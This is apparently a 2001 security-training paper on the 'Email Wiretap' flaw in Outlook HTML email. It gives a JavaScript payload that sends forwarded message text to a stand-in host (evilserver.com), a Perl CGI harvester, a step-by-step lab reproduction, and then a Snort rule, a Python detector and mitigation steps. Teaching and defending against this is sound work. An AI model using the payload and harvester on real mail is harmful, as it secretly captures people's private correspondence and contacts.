Email Wiretap
Carolyn A. Davenport
May 2, 2001

Exploit Name: Email Wiretap

Variants: None known

Operating System: Relevant to email readers on Windows 9x, NT, 2000, Mac

Protocols/services: utilizes the HTTP application protocol and the client-side active scripting interpreter of the email reader.

Brief description: Because of the insecure default settings of Outlook and Outlook Express, a malicious user can craft an HTML email that lets the sender read forwarded instances of the email, including any comments the forwarders add. In addition, the sender can use the email to track where it travels and compile a database of email addresses.

Credits: Discovered October 5, 1998 by Carl Voth

Protocol description:

How does the exploited protocol work?

When a user retrieves a web page via their browser (Netscape, Internet Explorer, lynx, etc.), they typically type a web address into an address bar. An example would be www.yahoo.com. The browser assumes that the protocol is HTTP. The browser then sends a request to the appropriate DNS server, asking for the IP address of the website. The DNS server should return an IP address. Once the IP address of the Internet server is known, a TCP connection is established with the Internet server. Next, the browser sends a request to the Internet server over the established TCP connection. An example would be "GET / HTTP/1.0" followed by a blank line (two CRLF sequences), which marks the end of the request headers.

[me@me html]$ telnet www.somename31337.com 80
Trying 192.168.1.1...
Connected to www.somename31337.com.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 19 Dec 1997 20:24:38 GMT
Server: someserver v1.2
Last-Modified: Thu, 03 Apr 1997 00:30:37 GMT
ETag: "someEtag"
Accept-Ranges: bytes
Content-Length: 112
Connection: close
Content-Type: text/html

<meta http-equiv="Refresh" content="0; url=http://someothersite.com/foo.html">
<!-- (C) 2001 SomeCompany -->

The Internet server returns a document to the browser. This document can contain scripting code, links to other servers, links to images, and much more. The browser now retrieves each separate image, script, link, etc. The user sees the page displayed within their browser window. Although the user only typed one web address into the address bar, the browser may have made many connections to many different servers across the Internet in order to retrieve all of the information displayed. Let's look at a more concrete example (NOTE: the domain names are fake).

Joe Smith is running Windows 2000 with Internet Explorer 5. Joe double-clicks his desktop "Internet Explorer" icon and his browser launches. Joe highlights the contents of his address bar and types in "www.goople3494.com". www.goople3494.com is resolved to IP address 192.168.1.1. A connection to 192.168.1.1 is established and Joe's browser sends the following request:

GET / HTTP/1.1
Accept: application/MSWord, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: www.goople3494.com
Connection: Keep-Alive

The web server replies HTTP/1.1 200 OK.

<specifics regarding version and type of server, date, etc.>

<html><body>
<img src="http://www.someotherserver3494.com/BigFatLogo.gif">
</body></html>

Joe's browser now resolves www.someotherserver3494 to IP address 192.168.1.2. A session, like the one above, occurs between www.someotherserver3494.com and Joe's browser. The image is downloaded and displayed in Joe's browser window.

As I mentioned above, the HTML downloaded from an Internet server, or read in an html email reader, can include scripts. Scripts are not displayed in the browser or html email reader. Instead, when the browser or email reader encounters the <script> directive, it reads all code up to the </script> directive. All code is interpreted and run on the client computer. In this example, JavaScript is used. JavaScript is a powerful, interpreted language. A simple example of JavaScript embedded within an html document is:

<html><body>
<script>
window.open("http://www.google.com");
</script>
</body></html>

DESCRIPTION OF VARIANTS:

None known.

How the exploit works:

There are 2 parts to this exploit.

Part one is the client email reader, which must support DHTML with active scripting enabled. The client must have an active connection to the Internet. Part two is an Internet server running a CGI script that receives and saves the forwarded messages.

The malicious user now creates an email with the following html:

<HTML><BODY>
<SCRIPT>
var evilserver = "http://www.evilserver.com/cgi-bin/harvester.cgi?";
var msg = document.body.innerText;
var sendit = new Image();
sendit.src = evilserver + "fwmsg=" + escape(msg);
</SCRIPT>
I think your partner is pretty durn hot!<br><br>
you know who ;-)
</BODY></HTML>

Before sending the email, the malicious user must:

1) have the ability to write and execute cgi scripts on the server www.evilserver.com
2) create a script to parse and save the forwarded messages.

The malicious user creates a script like:

#!/usr/bin/perl
# Append the raw request URI (which carries the escaped message) to the collection file.
open (OUT, ">>get_rez.txt") or die "cannot open get_rez.txt: $!";
print OUT "$ENV{'REQUEST_URI'}\n";
close (OUT);
# Emit a minimal header so the web server returns a well-formed response instead of a 500 error.
print "Content-type: text/plain\r\n\r\n";
exit(0);

Now the user sends the email to the intended victim. The victim receives the email and forwards the email, with comments, to his/her husband/wife, partner, boss, etc. When the recipient highlights the email in their email reader, the script will activate and forward the "forwarded" message to www.evilserver.com. The attacker now has the victim's reaction to his/her email. If the email is forwarded again, www.evilserver.com will receive and save any new comments added to the email as well as the list of email addresses that the victim forwarded to. This could go on endlessly. Each time the email is forwarded, the evil Internet server receives more comments and email addresses.

Diagram:

DEFER

How to Use the Exploit:

Now, we can get to a step-by-step working example. Please note that this should only be done in a lab environment for educational purposes. It is unethical (not to mention illegal in most places) to run this exploit on unsuspecting clients.

Prerequisites (i.e. what we'll need for this experiment)

Access to a Linux Apache web server. Access to a Windows machine with the Outlook email client. The Outlook client should already be configured to send and receive email with a valid account.

We need to create an html document. The simplest way to do this is to open up an editor. On your Windows machine:

1) click the start button.

2) Click the "Run" bar.

3) Type "cmd" (Windows NT/2000) or "command" (Windows 9x) in the window.

4) This will open up a DOS prompt. At the c:> prompt, type "notepad email_wiretap.html".

5) Click "Yes" on the "create a new file" message.

6) Insert the following into your new file:

<HTML><BODY>
<SCRIPT>
var evilserver = "http://10.10.10.10/cgi-bin/harvester.cgi?";
var msg = document.body.innerText;
var sendit = new Image();
sendit.src = evilserver + "fwmsg=" + escape(msg);
</SCRIPT>
I think your partner is pretty durn hot!<br><br>
you know who ;-)
</BODY></HTML>

In the above text, be sure to substitute the true IP address of your web server (i.e. change the 10.10.10.10 to your valid IP address). Next, click "file" and "Save as...". Save the file as "email_wiretap.html" onto your desktop.

Now, we need to set up the CGI script that will be harvesting these forwarded emails. For this example, we'll use the Apache web server running on Linux. On your Linux web server, locate your cgi-bin directory. The cgi-bin is defined in the Apache httpd.conf file. If you don't know where that file is, type "find / -name httpd.conf -print" at a command prompt. Then type 'grep "cgi\-bin" /path/to/httpd.conf | grep -i directory'. This should return the full path to your cgi-bin directory.

7) Change into the cgi-bin directory ("cd /path/to/cgi-bin").

8) Type, "vi harvester.cgi".

9) Type "i" to go into insert mode.

10) Type in the following program:

#!/usr/bin/perl
# Append the raw request URI (which carries the escaped message) to the collection file.
open (OUT, ">>get_rez.txt") or die "cannot open get_rez.txt: $!";
print OUT "$ENV{'REQUEST_URI'}\n";
close (OUT);
# Emit a minimal header so the web server returns a well-formed response instead of a 500 error.
print "Content-type: text/plain\r\n\r\n";
exit(0);

11) Type ":wq" to exit and save your file.

12) Type "chmod 755 harvester.cgi".

On the Windows machine

13) open your Outlook client.

14) Double-click on the file email_wiretap.html on your desktop. This should open a browser with the short message that you inserted above.

15) Click "Edit" and "Select All".

16) Click "Edit" and "Copy".

17) On your Outlook email client, click on "New Mail".

18) Enter your valid email address into the "To:" field. In the "Subject:" field, enter the subject line "This is a test".

19) Click on the main body of the email. Click "Edit" and "Paste". You should see the short message inserted into the main window of your new email message.

20) On your Linux machine, type the following command from inside the cgi-bin directory: "tail -f get_rez.txt". This will show you the message as it is appended to your collection file.

21) On the windows machine, hit the "send" button on your newly created email.

22) Wait a minute, and click "Send and Receive" to receive your test email.

23) Once received, right click on the email and click "Forward".

24) At the top of the email message type "This is the forwarded portion of the email".

25) Click "Send".

26) Retrieve your email again and highlight the forwarded message. You should see something like the following on your Linux web server (trimmed and sanitized):

/cgi-bin/harvester.cgi?fwmsg=This%20is%20the%20forwarded%20portion%20of%20the%20email%0D%0A%0D%0A-----%20Original%20Message%20-----%20%0D%0AFrom%3A%20Some%20Emailaddr%20%0D%0ATo%3A%20you@you.com%20%0D%0ASent%3A%20Thursday%2C%20February%2015%2C%202001%2012%3A46%20PM%0D%0ASubject%3A%20Fw%3A%20partner%0D%0A%0D%0AMessage%20-----

Note the string "This%20is%20the%20forwarded%20portion%20of%20the%20email%".

If you strip out the %20's (space), you see that the remote web server has successfully snagged the forwarded portion of the email.

Signature of the attack:

This attack is very hard to pin a signature on. The outbound HTTP GET request is valid and common traffic on most networks. The only part that looks a little out of place is the %0D%0A (CRLF) interspersed within the email and the fact that someuser@yourcompany.com is also included in the URL. Unfortunately, we can't match on the "%0D%0A" since the CRLF is prevalent in all HTTP requests. We can however, create a signature to look for outgoing "user@yourcompany.com" embedded in HTTP GET requests (I guarantee this will generate false positives!).

Snort rule:

alert tcp any any -> any 80 (msg:"Outgoing web request with email addresses in GET request"; content:"@yourcompany.com"; nocase;)
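The same signature idea carried one step further, as an added example that is not part of the original paper: it percent-decodes the query string of outbound GET requests (so the %0D%0A and %20 sequences become CRLF and spaces again), tags a request as a wiretap hit only when an organisation address appears together with CRLF-separated quoted-message text, and otherwise reports the weaker address-only match the Snort rule above makes. The log lines, the 10.10.10.10 server and the alice/bob/help addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

ORG_DOMAIN = "yourcompany.com"   # the domain the Snort rule above keys on
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed outbound-proxy log lines ("METHOD URL"); not captured from a real network.
SAMPLE_REQUESTS = [
    # Same shape as the harvester hit shown earlier, with constructed addresses.
    "GET http://10.10.10.10/cgi-bin/harvester.cgi?fwmsg=This%20is%20the%20forwarded"
    "%20portion%20of%20the%20email%0D%0A%0D%0A-----%20Original%20Message%20-----"
    "%20%0D%0AFrom%3A%20alice@yourcompany.com%0D%0ATo%3A%20bob@yourcompany.com",
    # Benign: a contact page echoing an address, with no CRLF and no quoted message.
    "GET http://www.example.com/contact?ref=help@yourcompany.com",
    # Benign: a plain image fetch with no query string.
    "GET http://www.example.com/images/logo.gif",
]

def decode_query(url):
    """Percent-decode the query string, so %0D%0A becomes a real CRLF again."""
    return unquote(urlsplit(url).query)

def analyse_request(line):
    """Classify one 'METHOD URL' line and return a dict, or None if uninteresting.

    tag 'wiretap'      - org addresses plus CRLF-separated text with a quoted-message
                         marker: the combination a leaked forwarded mail produces.
    tag 'address-only' - only an org address in the query: what the Snort rule above
                         matches, and the false positive it warns about.
    """
    method, _, url = line.partition(" ")
    if method != "GET":
        return None
    payload = decode_query(url)
    addresses = sorted({a for a in EMAIL_RE.findall(payload)
                        if a.lower().endswith("@" + ORG_DOMAIN)})
    if not addresses:
        return None
    quoted_mail = "\r\n" in payload and ("Original Message" in payload or "From:" in payload)
    # The leaked text is whatever the forwarder typed before the quoted original.
    leaked = payload.split("-----", 1)[0].partition("=")[2].strip() if quoted_mail else ""
    return {"tag": "wiretap" if quoted_mail else "address-only",
            "addresses": addresses, "leaked": leaked}

def scan(lines):
    """Run analyse_request over a batch of log lines, keeping only the hits."""
    return [hit for hit in map(analyse_request, lines) if hit]
```

Run against SAMPLE_REQUESTS, scan() returns one "wiretap" hit carrying the decoded forwarded text and both addresses, one "address-only" hit for the contact page, and nothing for the image fetch.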

How to protect against this attack:

Disable active scripting within your email reader.

1) open Outlook client and click "tools" and "options".

2) click "security"

3) change zone setting to "restricted zone"

4) click "zone settings".

5) highlight "restricted sites"

6) click "custom level"

7) scroll down to "active scripting" and click disable

8) click "OK" 3 times to exit the existing windows.

Source Code/Pseudo code

The code samples above work just fine. However, for more detailed scripts, see the URL below.

http://www.geocities.com/ResearchTriangle/Facility/8332/reaper-exploit-release.html

Links to additional information:

http://www.geocities.com/ResearchTriangle/Facility/8332/reaper-exploit-release.html

http://www.cen.uiuc.edu/~ejk/browser-security.html#Voth

http://www.idg.net/crd_privacy_412136_103.html

http://www.cli.org/emailpolicy/ECPA.html

http://www.infoworld.com/articles/hn/xml/01/02/05/010205hnwiretap.xml

